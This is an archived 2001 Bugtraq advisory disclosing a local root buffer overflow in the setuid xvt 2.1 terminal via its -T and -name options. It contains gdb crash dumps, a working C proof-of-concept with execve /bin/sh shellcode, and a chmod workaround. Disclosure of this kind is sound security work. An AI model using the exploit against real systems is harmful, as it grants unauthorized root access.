6696053 2001-07-02 16:01 +0200  /183 lines/ BAILLEUX Christophe <cb@t-online.fr>
Sent by: joel@lysator.liu.se
Imported: 2001-07-02  18:47  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17738>
Comment on text 6627929 by Samuel Dralet <samuel.dralet@mastersecurity.fr>
Subject: Xvt 2.1 vulnerability
------------------------------------------------------------
From: BAILLEUX Christophe <cb@t-online.fr>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.21.0107021553380.18326-100000@tshaw.grolier.fr>

Package:                xvt
Version:                2.1
Problem type:           Local root vulnerability
Linux distribution:     only tested on Debian



----]   Introduction

xvt is an X terminal-emulator that is designed to be more or less
compatible with xterm while using much less swap space. It is mainly
intended for use at sites which use large numbers of X terminals but
may also be useful on single workstations that are short of
memory. The main way that xvt achieves its small size is by avoiding
the use of the X toolkit.

http://packages.debian.org/stable/x11/xvt.html


----]   Problems

After the security advisory about rxvt by Samuel Dralet
(samuel.dralet@mastersecurity.fr), I discovered that xvt has some
possible buffer overrun conditions related to passing large arguments
to xvt's -T and -name command-line options.  Since xvt is installed
setuid root by default, it was possible for a normal user to pass
carefully-crafted arguments to xvt such that xvt executed a root
shell.

The Debian Security Team has been informed.
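
As an added illustration (not xvt's source and not part of the original advisory), the defect class described above beside a bounded handler for the same two options; OPT_MAX, struct xopts, parse_xopts and the 64-byte buffer size are assumptions made for this example.

```c
#include <string.h>
#define OPT_MAX 64   /* hypothetical buffer size, not xvt's real one */

struct xopts { char title[OPT_MAX]; char name[OPT_MAX]; };  /* -T, -name */

/* Copy an option value only if it fits, NUL included. An unchecked strcpy()
 * here is the defect class the advisory describes: a longer value would run
 * past the buffer into the saved frame on the stack. */
static int copy_bounded(char dst[OPT_MAX], const char *src)
{
    size_t len = strlen(src);
    if (len >= OPT_MAX)
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Returns 0 on success, otherwise the index of the offending argument so the
 * caller can report it and exit instead of continuing with a bad value. */
int parse_xopts(int argc, char **argv, struct xopts *o)
{
    int i;
    memset(o, 0, sizeof *o);
    for (i = 1; i + 1 < argc; i += 2) {
        char *dst = strcmp(argv[i], "-T") == 0 ? o->title
                  : strcmp(argv[i], "-name") == 0 ? o->name : NULL;
        if (dst == NULL)
            return i;                      /* unknown option */
        if (copy_bounded(dst, argv[i + 1]) != 0)
            return i + 1;                  /* too long: rejected, not truncated */
    }
    return i < argc ? i : 0;               /* trailing option without a value */
}

/* Mirrors the advisory's cases: returns 0 when a normal value is accepted and
 * a 262-byte -T value (the length that crashes xvt in the demo) is refused. */
int check_advisory_cases(void)
{
    struct xopts o;
    char big[263];                         /* constructed over-long argument */
    char *ok_argv[]  = { "xvt", "-T", "console", "-name", "xvt" };
    char *bad_argv[] = { "xvt", "-T", big };
    memset(big, 'A', sizeof big - 1); big[sizeof big - 1] = '\0';
    if (parse_xopts(5, ok_argv, &o) != 0 || strcmp(o.name, "xvt") != 0)
        return 1;
    if (parse_xopts(3, bad_argv, &o) != 2)
        return 2;
    return 0;
}
```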


----]   Demo


$ ls -l /usr/bin/X11/xvt
-rwsr-xr-x    1 root     root        50288 Mar 26  2000 /usr/bin/X11/xvt


$ xvt -V
xvt version 2.1



A)      xvt -name <buffer>


$ xvt -name `perl -e 'print "A"x234'`
Segmentation fault (core dumped)
$

tshaw:~$ gdb --core core
GNU gdb 5.0
<snip>
Core was generated by `xvt -name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb)



B)      xvt -T <buffer>


$ xvt -T `perl -e 'print "A"x262'`
Segmentation fault (core dumped)
$

$ gdb --core core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
<snip>
Core was generated by `xvt -T
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x804b043 in ?? ()
(gdb) where
#0  0x804b043 in ?? ()
#1  0x804c075 in ?? ()
#2  0x804b4f6 in ?? ()
#3  0x804a19c in ?? ()
(gdb) info reg
eax            0x8004100        134234368
ecx            0xffffffff       -1
edx            0x805524f        134566479
ebx            0x8055148        134566216
esp            0xbfffdea0       0xbfffdea0
ebp            0xbfffdeac       0xbfffdeac
esi            0x8004141        134234433
edi            0x8004141        134234433
eip            0x804b043        0x804b043
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x2b     43
gs             0x2b     43
fctrl          0x0      0
fstat          0x0      0
ftag           0x0      0
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
(gdb)



----]   Proof of concept


--- expl.c ---

/*

   /usr/bin/X11/xvt overflow proof of concept by cb@t-online.fr.

   tshaw:~$ ./expl
   bash#

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memset, memcpy, strlen */
#include <unistd.h>     /* execl */

int main(void)
{
    char buf[235];      /* 234 bytes of argument plus the terminating NUL */
    int i;

    /* execve("/bin/sh") followed by exit() */
    char code[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

    /* filler up to the saved return address */
    for(i=0; i<76; i++)
        buf[i] = 0x41;

    *(long *)&buf[76]=0xbffffab0; /* ret addr (stack address, environment-specific) */

    /* NOP sled (0x90) over the rest of the argument, shellcode at its end */
    memset(buf + 80, 0x90, 234 - 80);
    memcpy(buf + 233 - strlen(code), code, strlen(code));

    buf[234] = '\0';

    execl("/usr/bin/X11/xvt", "xvt", "-name", buf, (char *)0);
    return 0;
}

--- expl.c ---



----]   Workaround


# chmod u-s /usr/bin/X11/xvt



----]   Greetings


Samuel Dralet   samuel.dralet@mastersecurity.fr
Tufqi           tuf@mmania.com


--
Christophe Bailleux - Network & System Security Engineer
Club-Internet / T-Online France
Voice:+33-(0)1-5545-4789 - mailto:cb@t-online.fr
(6696053) /BAILLEUX Christophe <cb@t-online.fr>/(Reflowed)